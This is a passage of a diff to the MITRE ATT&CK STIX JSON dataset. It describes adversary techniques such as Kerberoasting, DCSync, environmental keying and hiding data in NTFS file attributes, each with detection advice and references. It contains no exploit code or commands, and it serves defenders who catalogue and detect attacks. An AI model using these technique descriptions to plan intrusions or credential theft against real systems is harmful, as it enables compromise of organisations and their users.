"x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "created": "2020-03-10T18:33:36.159Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1569/002", + "external_id": "T1569.002" + }, + { + "source_name": "Microsoft Service Control Manager", + "description": "Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.", + "url": "https://docs.microsoft.com/windows/win32/services/service-control-manager" + }, + { + "source_name": "Russinovich Sysinternals", + "description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-29T15:42:13.499Z", + "name": "Cloud Accounts", + "description": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nService or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.\n\nAn adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. \n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jon Sternstein, Stern Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "1.7", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "created": "2020-03-13T20:36:57.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1078/004", + "external_id": "T1078.004" + }, + { + "source_name": "AWS Identity Federation", + "description": "Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.", + "url": "https://aws.amazon.com/identity/federation/" + }, + { + "source_name": "Google Federating GC", + "description": "Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.", + "url": "https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction" + }, + { + "source_name": "Microsoft Deploying AD Federation", + "description": "Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Environmental Keying", + "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Nick Carr, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host Forensic Analysis", + "Signature-based Detection", + "Static File Analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "created": "2020-06-23T22:28:28.041Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1480/001", + "external_id": "T1480.001" + }, + { + "source_name": "Proofpoint Router Malvertising", + "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices" + }, + { + "source_name": "Kaspersky Gauss Whitepaper", + "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf" + }, + { + "source_name": "Ebowla: Genetic Malware", + "description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.", + "url": "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf" + }, + { + "source_name": "EK Clueless Agents", + "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.", + "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf" + }, + { + "source_name": "EK Impeding Malware Analysis", + "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.", + "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf" + }, + { + "source_name": "Demiguise Guardrail Router Logo", + "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.", + "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js" + }, + { + "source_name": "Environmental Keyed HTA", + "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.", + "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Fallback Channels", + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "created": "2017-05-31T21:30:21.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1008", + "external_id": "T1008" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-14T21:56:34.831Z", + "name": "NTFS File Attributes", + "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oddvar Moe, @oddvarmoe", + "Red Canary" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host forensic analysis", + "Signature-based detection" + ], + "x_mitre_system_requirements": [ + "NTFS partitioned hard drive" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "created": "2020-03-13T20:33:00.009Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/004", + "external_id": "T1564.004" + }, + { + "source_name": "MalwareBytes ADS July 2015", + "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.", + "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" + }, + { + "source_name": "SpectorOps Host-Based Jul 2017", + "description": "Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.", + "url": "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea" + }, + { + "source_name": "Journey into IR ZeroAccess NTFS EA", + "description": "Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.", + "url": "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html" + }, + { + "source_name": "Microsoft NTFS File Attributes Aug 2010", + "description": "Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.", + "url": "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/" + }, + { + "source_name": "Microsoft ADS Mar 2014", + "description": "Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.", + "url": "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/" + }, + { + "source_name": "Microsoft File Streams", + "description": "Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/aa364404" + }, + { + "source_name": "Oddvar Moe ADS2 Apr 2018", + "description": "Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.", + "url": "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/" + }, + { + "source_name": "Oddvar Moe ADS1 Jan 2018", + "description": "Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.", + "url": "https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/" + }, + { + "source_name": "Symantec ADS May 2009", + "description": "Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.", + "url": "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:46.538Z", + "name": "Kerberoasting", + "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Valid domain account or the ability to sniff traffic within a domain" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "created": "2020-02-11T18:43:38.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/003", + "external_id": "T1558.003" + }, + { + "source_name": "Empire InvokeKerberoast Oct 2016", + "description": "EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.", + "url": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" + }, + { + "source_name": "AdSecurity Cracking Kerberos Dec 2015", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "url": "https://adsecurity.org/?p=2293" + }, + { + "source_name": "Microsoft Detecting Kerberoasting Feb 2018", + "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", + "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/" + }, + { + "source_name": "Microsoft SPN", + "description": "Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.", + "url": "https://msdn.microsoft.com/library/ms677949.aspx" + }, + { + "source_name": "Microsoft SetSPN", + "description": "Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.", + "url": "https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx" + }, + { + "source_name": "SANS Attacking Kerberos Nov 2014", + "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", + "url": "https://redsiege.com/kerberoast-slides" + }, + { + "source_name": "Harmj0y Kerberoast Nov 2016", + "description": "Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "NTFS File Attributes", + "description": "Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Red Canary", + "Oddvar Moe, @oddvarmoe" + ], + "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Signature-based detection", + "Host forensic analysis", + "Anti-virus" + ], + "x_mitre_system_requirements": [ + "NTFS partitioned hard drive" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f2d44246-91f1-478a-b6c8-1227e0ca109d", + "created": "2017-05-31T21:31:11.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1096", + "external_id": "T1096" + }, + { + "source_name": "SpectorOps Host-Based Jul 2017", + "description": "Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.", + "url": "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea" + }, + { + "source_name": "Microsoft NTFS File Attributes Aug 2010", + "description": "Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.", + "url": "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/" + }, + { + "source_name": "Microsoft File Streams", + "description": "Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/aa364404" + }, + { + "source_name": "MalwareBytes ADS July 2015", + "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.", + "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" + }, + { + "source_name": "Microsoft ADS Mar 2014", + "description": "Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.", + "url": "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/" + }, + { + "source_name": "Journey into IR ZeroAccess NTFS EA", + "description": "Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.", + "url": "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html" + }, + { + "source_name": "Oddvar Moe ADS1 Jan 2018", + "description": "Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.", + "url": "https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/" + }, + { + "source_name": "Oddvar Moe ADS2 Apr 2018", + "description": "Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.", + "url": "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/" + }, + { + "source_name": "Symantec ADS May 2009", + "description": "Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.", + "url": "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "DCSync", + "description": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.\n\nMembers of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)\n\nDCSync functionality has been included in the \"lsadump\" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ExtraHop", + "Vincent Le Toux" + ], + "x_mitre_detection": "Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication 